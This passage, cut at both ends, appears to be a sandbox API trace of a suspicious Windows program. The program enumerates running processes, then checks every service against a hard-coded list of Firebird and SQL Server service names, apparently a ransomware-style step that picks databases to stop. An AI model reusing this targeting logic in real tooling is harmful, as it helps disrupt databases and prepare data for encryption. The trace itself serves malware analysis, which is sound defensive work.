th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.147] lstrlenW (lpString="svchost.exe") returned 11 [0190.147] Process32NextW (in: hSnapshot=0x378, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x4b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0190.148] lstrlenW (lpString="audiodg.exe") returned 11 [0190.148] Process32NextW (in: hSnapshot=0x378, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0190.149] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0190.149] Process32NextW (in: hSnapshot=0x378, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x754, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0190.149] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0190.149] Process32NextW (in: hSnapshot=0x378, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0190.150] lstrlenW (lpString="Memory Compression") returned 18 [0190.150] Process32NextW (in: hSnapshot=0x378, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x854, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0190.151] lstrlenW (lpString="sihost.exe") returned 10 [0190.151] Process32NextW (in: hSnapshot=0x378, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.152] lstrlenW (lpString="svchost.exe") returned 11 [0190.152] Process32NextW (in: hSnapshot=0x378, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3bc, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0190.153] lstrlenW (lpString="msoia.exe") returned 9 [0190.153] Process32NextW (in: hSnapshot=0x378, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0190.153] lstrlenW (lpString="taskhostw.exe") returned 13 [0190.153] Process32NextW (in: hSnapshot=0x378, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3e, th32ParentProcessID=0x9c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0190.154] lstrlenW (lpString="explorer.exe") returned 12 [0190.154] Process32NextW (in: hSnapshot=0x378, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0190.155] lstrlenW (lpString="SearchUI.exe") returned 12 [0190.155] Process32NextW (in: hSnapshot=0x378, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0190.156] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0190.156] Process32NextW (in: hSnapshot=0x378, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0190.181] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0190.181] Process32NextW (in: hSnapshot=0x378, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xca0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0190.182] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0190.182] Process32NextW (in: hSnapshot=0x378, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0xe24, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 1 [0190.183] lstrlenW (lpString="hgaibc.exe") returned 10 [0190.183] Process32NextW (in: hSnapshot=0x378, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0xe24, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 0 [0190.183] CloseHandle (hObject=0x378) returned 1 [0190.184] Sleep (dwMilliseconds=0x1f4) [0190.703] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x6bf038 [0190.704] EnumServicesStatusExW (in: hSCManager=0x6bf038, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x245ff3c, lpServicesReturned=0x245ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x245ff3c, lpServicesReturned=0x245ff54, lpResumeHandle=0x0) returned 0 [0190.705] GetLastError () returned 0xea [0190.705] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1c30) returned 0x6d87a0 [0190.705] EnumServicesStatusExW (in: hSCManager=0x6bf038, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x6d87a0, cbBufSize=0x1c30, pcbBytesNeeded=0x245ff3c, lpServicesReturned=0x245ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x6d87a0, pcbBytesNeeded=0x245ff3c, lpServicesReturned=0x245ff54, lpResumeHandle=0x0) returned 1 [0190.706] CloseServiceHandle (hSCObject=0x6bf038) returned 1 [0190.706] lstrlenW (lpString="Appinfo") returned 7 [0190.706] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0190.706] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0190.706] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0190.706] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0190.706] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0190.706] lstrlenW (lpString="AppXSvc") returned 7 [0190.706] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0190.706] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0190.706] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0190.706] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0190.706] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0190.706] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0190.707] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0190.707] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0190.707] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0190.707] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0190.707] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0190.707] lstrlenW (lpString="Audiosrv") returned 8 [0190.707] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0190.707] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0190.707] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0190.707] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0190.707] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0190.707] lstrlenW (lpString="BFE") returned 3 [0190.707] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0190.707] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0190.707] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0190.707] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0190.707] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0190.707] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0190.707] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0190.707] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0190.707] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0190.707] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0190.707] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0190.707] lstrlenW (lpString="CDPSvc") returned 6 [0190.707] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0190.707] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0190.707] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0190.707] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0190.708] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0190.708] lstrlenW (lpString="ClickToRunSvc") returned 13 [0190.708] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0190.708] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0190.708] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0190.708] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0190.708] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0190.708] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0190.708] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0190.708] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0190.708] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0190.708] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0190.708] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0190.708] lstrlenW (lpString="CryptSvc") returned 8 [0190.708] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0190.708] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0190.708] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0190.708] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0190.708] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0190.708] lstrlenW (lpString="DcomLaunch") returned 10 [0190.708] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0190.708] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0190.708] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0190.708] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0190.708] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0190.708] lstrlenW (lpString="DeviceAssociationService") returned 24 [0190.708] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0190.708] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0190.708] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0190.709] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0190.709] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0190.709] lstrlenW (lpString="Dhcp") returned 4 [0190.709] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0190.709] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0190.709] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0190.709] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0190.709] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0190.709] lstrlenW (lpString="Dnscache") returned 8 [0190.709] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0190.709] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0190.709] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0190.709] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0190.709] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0190.709] lstrlenW (lpString="DPS") returned 3 [0190.709] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0190.709] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0190.709] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0190.709] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0190.709] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0190.709] lstrlenW (lpString="DusmSvc") returned 7 [0190.709] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0190.709] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0190.709] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0190.709] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0190.709] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0190.709] lstrlenW (lpString="EventLog") returned 8 [0190.709] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0190.710] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0190.710] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0190.710] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0190.710] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0190.710] lstrlenW (lpString="EventSystem") returned 11 [0190.710] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0190.710] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0190.710] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0190.710] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0190.710] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0190.710] lstrlenW (lpString="FontCache") returned 9 [0190.710] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0190.710] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0190.710] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0190.710] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0190.710] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0190.710] lstrlenW (lpString="gpsvc") returned 5 [0190.710] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0190.710] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0190.710] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0190.710] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0190.710] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0190.710] lstrlenW (lpString="iphlpsvc") returned 8 [0190.710] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0190.710] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0190.710] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0190.710] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0190.710] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0190.710] lstrlenW (lpString="KeyIso") returned 6 [0190.710] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0190.711] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0190.711] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0190.711] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0190.711] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0190.711] lstrlenW (lpString="LanmanServer") returned 12 [0190.711] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0190.711] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0190.711] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0190.711] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0190.711] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0190.711] lstrlenW (lpString="LanmanWorkstation") returned 17 [0190.711] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0190.711] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0190.711] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0190.711] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0190.711] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0190.711] lstrlenW (lpString="lfsvc") returned 5 [0190.711] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0190.711] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0190.711] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0190.711] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0190.711] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0190.711] lstrlenW (lpString="lmhosts") returned 7 [0190.711] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0190.711] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0190.711] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0190.711] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0190.711] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0190.711] lstrlenW (lpString="LSM") returned 3 [0190.711] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0190.712] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0190.712] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0190.712] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0190.712] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0190.712] lstrlenW (lpString="MpsSvc") returned 6 [0190.712] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0190.712] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0190.712] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0190.712] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0190.712] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0190.712] lstrlenW (lpString="NcbService") returned 10 [0190.712] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0190.712] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0190.712] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0190.712] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0190.712] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0190.712] lstrlenW (lpString="netprofm") returned 8 [0190.712] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0190.712] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0190.712] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0190.712] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0190.712] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0190.712] lstrlenW (lpString="NgcSvc") returned 6 [0190.712] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NgcSvc") returned -1 [0190.712] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NgcSvc") returned -1 [0190.712] lstrcmpiW (lpString1="sqlwriter", lpString2="NgcSvc") returned 1 [0190.712] lstrcmpiW (lpString1="mssqlserver", lpString2="NgcSvc") returned -1 [0190.712] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NgcSvc") returned 1 [0190.712] lstrlenW (lpString="NlaSvc") returned 6 [0190.713] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0190.713] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0190.713] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0190.713] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0190.713] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0190.713] lstrlenW (lpString="nsi") returned 3 [0190.713] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0190.713] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0190.713] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0190.713] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0190.713] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0190.713] lstrlenW (lpString="PcaSvc") returned 6 [0190.713] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0190.713] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0190.713] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0190.713] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0190.713] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0190.713] lstrlenW (lpString="PlugPlay") returned 8 [0190.713] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0190.713] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0190.713] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0190.713] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0190.713] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0190.713] lstrlenW (lpString="Power") returned 5 [0190.713] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0190.713] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0190.713] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0190.713] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0190.713] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0190.714] lstrlenW (lpString="ProfSvc") returned 7 [0190.714] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0190.714] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0190.714] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0190.714] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0190.714] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0190.714] lstrlenW (lpString="RpcEptMapper") returned 12 [0190.714] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0190.714] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0190.714] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0190.714] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0190.714] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0190.714] lstrlenW (lpString="RpcSs") returned 5 [0190.714] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0190.714] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0190.714] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0190.714] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0190.714] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0190.714] lstrlenW (lpString="SamSs") returned 5 [0190.714] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0190.714] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0190.714] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0190.714] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0190.714] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0190.714] lstrlenW (lpString="Schedule") returned 8 [0190.714] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0190.714] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0190.714] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0190.714] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0190.714] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0190.715] lstrlenW (lpString="SecurityHealthService") returned 21 [0190.715] lstrcmpiW 